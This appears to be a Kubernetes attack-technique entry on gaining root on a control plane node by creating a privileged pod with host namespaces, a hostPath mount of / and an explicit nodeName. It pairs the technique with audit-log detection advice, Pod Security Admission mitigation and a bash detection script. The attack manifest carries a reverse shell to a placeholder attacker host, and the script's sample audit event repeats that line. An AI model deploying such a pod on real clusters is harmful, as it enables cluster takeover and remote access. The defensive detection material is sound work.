Create a pod with significant privilege (hostPath=/, etc.) and schedule on a target node via setting the
|PermissionSet||Node||Container Orchestration Job, T1053.007|
Given the rights to create a new pod, an attacker can create a deliberately overprivileged pod within the cluster. A pod that runs privileged, shares the node's PID, IPC and network namespaces, and mounts the node's root filesystem through a hostPath volume gives the attacker root-level control of whichever node it is scheduled on; no separate container escape is needed, since `chroot /host` from inside the container already yields a root shell on the node. Additionally, by setting the `nodeName` field in the pod spec to the name of a control plane node, the attacker bypasses the scheduler and lands the pod on that node, gaining root access to the control plane and thereby control of the entire cluster (on kubeadm-built clusters, for example, the cluster CA and the API server keys live on that node under /etc/kubernetes/pki).
A role (or cluster role) bound to the current account that grants the `create` verb on `pods`.
Check whether the current account has the ability to create pods, for example using kubectl:
Identify the name of the target (e.g. control plane) node via:
Create a pod spec for our attack pod (N.B. if the target is a control plane node it is normally tainted with `node-role.kubernetes.io/control-plane:NoSchedule`, or `node-role.kubernetes.io/master:NoSchedule` on older clusters, so you may need to add a matching toleration to this manifest to allow it to be scheduled):
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: control-plane-attack
  labels:
    app: pentest
spec:
  hostNetwork: true   # share the node's network namespace
  hostPID: true       # share the node's PID namespace (see/ptrace node processes)
  hostIPC: true       # share the node's IPC namespace
  containers:
  - name: control-plane-attack
    image: ubuntu
    securityContext:
      privileged: true   # all capabilities, device access, no seccomp/AppArmor confinement
    volumeMounts:
    - mountPath: /host   # the node's root filesystem, writable
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    # reverse shell back to the attacker's listener
    args: [ "bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1" ]
  nodeName: < TARGET NODE NAME >   # bypasses the scheduler; the pod lands on this node
  volumes:
  - name: noderoot
    hostPath:
      path: /
```
Create the pod via kubectl:
- Monitor the API server audit log for pod creation requests made with a pod's service account token (username `system:serviceaccount:<namespace>:<name>`, source IP inside the pod network), i.e. a pod creating pods; controllers that run inside kube-controller-manager also use service account identities and need to be allowlisted
- Monitor pod creation requests whose spec sets `privileged: true`, `hostPID`/`hostIPC`/`hostNetwork`, a `hostPath` volume on `/`, or an explicit `nodeName`, especially combined with shell-style command arguments such as a reverse shell; this requires an audit policy that records pod requests at the `Request` or `RequestResponse` level so that the submitted spec is logged
Implement security policies
Use an admission controller to prevent or limit the creation of pods with these capabilities. The built-in Pod Security Admission (PodSecurityPolicy was removed in Kubernetes 1.25) at the `baseline` or `restricted` level rejects privileged containers, host namespaces and hostPath volumes; a policy engine such as OPA Gatekeeper or Kyverno can additionally forbid an explicit `nodeName` and tolerations for the control plane taints, which Pod Security Admission does not cover. Independently, keep the `create pods` permission itself to the smallest possible set of accounts.
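One script covering both the detection bullets and the mitigation above, added here as an example (not code from the original page or from any Kubernetes project). A single predicate over a pod spec is used twice: to flag pod creation events in kube-apiserver audit log lines (one JSON event per line, the format of the log backend) and as a local pre-apply gate; the Pod Security Admission labels are then the cluster-side control. Assumptions: the audit policy records pods at level `Request` or `RequestResponse` so `requestObject` holds the submitted spec, the controller allowlist is an illustrative starting point, and the sample events are constructed for this example.

```shell
#!/usr/bin/env bash
# Added example (not from the original page). Shared predicate for
#  1. detection: flag pod creations in audit-log lines that carry the markers
#     of the attack pod above (privileged, host namespaces, hostPath /, nodeName)
#  2. prevention: the same predicate as a CI gate, plus Pod Security Admission
#     labels so the API server itself rejects such pods.
# Assumes one JSON audit event per line with requestObject present
# (audit policy level Request or RequestResponse for pods).
set -u

# Markers of an overprivileged spec as they appear in minified JSON (grep -E).
PRIV_MARKERS='"privileged":true|"hostPID":true|"hostIPC":true|"hostNetwork":true|"hostPath":\{"path":"/"[,}]'
# Service accounts of kube-controller-manager controllers that legitimately
# create privileged pods (CNI/CSI DaemonSets); not "a pod creating a pod".
# Illustrative allowlist, extend for your cluster.
CONTROLLER_SAS='system:serviceaccount:kube-system:(daemon-set|replicaset|job|statefulset|cronjob)-controller'

# spec_markers: read JSON on stdin, print the marker keys that matched (sorted).
spec_markers() {
  tr -d ' \n\t' | grep -Eo "$PRIV_MARKERS" \
    | sed 's/"\([a-zA-Z]*\)":.*/\1/' | LC_ALL=C sort -u | paste -sd ' ' -
}

# pod_risk_flags LINE: classify one audit event. Empty output = not interesting.
#   PRIV      privileged / host namespaces / hostPath root requested
#   NODENAME  nodeName set: scheduler bypassed, node chosen by the caller
#   FROM_POD  created with a pod's service account token (controllers excluded)
pod_risk_flags() {
  local line=$1 flags=""
  printf '%s' "$line" | grep -Eq '"verb":"create"' || return 0
  printf '%s' "$line" | grep -Eq '"objectRef":\{[^}]*"resource":"pods"' || return 0
  # pods/exec and pods/binding are also "create" on pods; skip subresources
  printf '%s' "$line" | grep -Eq '"objectRef":\{[^}]*"subresource":' && return 0
  [ -n "$(printf '%s' "$line" | spec_markers)" ] && flags="$flags PRIV"
  printf '%s' "$line" | grep -Eq '"nodeName":"[^"]+"' && flags="$flags NODENAME"
  if printf '%s' "$line" | grep -Eq '"username":"system:serviceaccount:' \
     && ! printf '%s' "$line" | grep -Eq "\"username\":\"$CONTROLLER_SAS\""; then
    flags="$flags FROM_POD"
  fi
  printf '%s\n' "${flags# }"
}

# scan_audit_log: stdin = audit log; prints "flags<TAB>user<TAB>namespace/pod".
scan_audit_log() {
  local line flags user ns pod
  while IFS= read -r line; do
    flags=$(pod_risk_flags "$line")
    [ -n "$flags" ] || continue
    user=$(printf '%s' "$line" | sed -nE 's/.*"username":"([^"]*)".*/\1/p')
    ns=$(printf '%s' "$line" | sed -nE 's/.*"objectRef":\{[^}]*"namespace":"([^"]*)".*/\1/p')
    pod=$(printf '%s' "$line" | sed -nE 's/.*"objectRef":\{[^}]*"name":"([^"]*)".*/\1/p')
    printf '%s\t%s\t%s/%s\n' "$flags" "$user" "$ns" "$pod"
  done
}

# Constructed sample events (not real cluster output): the attack pod created
# with a pod's token, a benign pod from a human, a DaemonSet pod created by the
# controller, and a pod exec (create on a subresource).
sample_events() {
  cat <<'EOF'
{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","stage":"ResponseComplete","verb":"create","user":{"username":"system:serviceaccount:default:webapp"},"sourceIPs":["10.244.1.7"],"objectRef":{"resource":"pods","namespace":"default","name":"control-plane-attack","apiVersion":"v1"},"responseStatus":{"code":201},"requestObject":{"kind":"Pod","apiVersion":"v1","metadata":{"name":"control-plane-attack"},"spec":{"hostNetwork":true,"hostPID":true,"hostIPC":true,"nodeName":"cp-1","containers":[{"name":"c","image":"ubuntu","securityContext":{"privileged":true},"command":["/bin/sh","-c","--"],"args":["bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"]}],"volumes":[{"name":"noderoot","hostPath":{"path":"/"}}]}}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","stage":"ResponseComplete","verb":"create","user":{"username":"alice@example.com"},"objectRef":{"resource":"pods","namespace":"default","name":"web","apiVersion":"v1"},"responseStatus":{"code":201},"requestObject":{"kind":"Pod","apiVersion":"v1","spec":{"containers":[{"name":"web","image":"nginx"}]}}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","stage":"ResponseComplete","verb":"create","user":{"username":"system:serviceaccount:kube-system:daemon-set-controller"},"objectRef":{"resource":"pods","namespace":"kube-system","name":"kube-proxy-x7k2p","apiVersion":"v1"},"responseStatus":{"code":201},"requestObject":{"kind":"Pod","apiVersion":"v1","spec":{"hostNetwork":true,"containers":[{"name":"kube-proxy","image":"registry.k8s.io/kube-proxy","securityContext":{"privileged":true}}]}}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","stage":"ResponseStarted","verb":"create","user":{"username":"alice@example.com"},"objectRef":{"resource":"pods","namespace":"default","name":"web","subresource":"exec","apiVersion":"v1"},"responseStatus":{"code":101}}
EOF
}

# enforce_restricted_psa NAMESPACE: have the API server reject privileged
# containers, host namespaces and hostPath volumes (Pod Security Admission).
# Roll out with warn/audit first; use enforce=baseline if restricted breaks workloads.
enforce_restricted_psa() {
  kubectl label --overwrite namespace "$1" \
    pod-security.kubernetes.io/enforce=restricted \
    pod-security.kubernetes.io/enforce-version=latest \
    pod-security.kubernetes.io/warn=restricted
}

# precheck_manifest FILE: CI-side gate with the same predicate; nonzero if risky.
precheck_manifest() {
  local m
  m=$(kubectl apply --dry-run=client -o json -f "$1" | spec_markers)
  [ -z "$m" ] || { printf 'rejected %s: %s\n' "$1" "$m" >&2; return 1; }
}

# Usage: ./pod-audit.sh demo   (or: ./pod-audit.sh < /var/log/kubernetes/audit.log)
if [ "${1:-}" = "demo" ]; then sample_events | scan_audit_log; else [ -t 0 ] || scan_audit_log; fi
```

Running it with `demo` reports the attack pod as `PRIV NODENAME FROM_POD` and the kube-proxy pod as `PRIV` only, while the human-created nginx pod and the exec produce nothing. Note that Pod Security Admission does not constrain `nodeName` or tolerations, so the NODENAME signal stays a detection matter unless a policy engine enforces it; and the grep-based matching only works on minified single-line events, which is why `spec_markers` strips whitespace first.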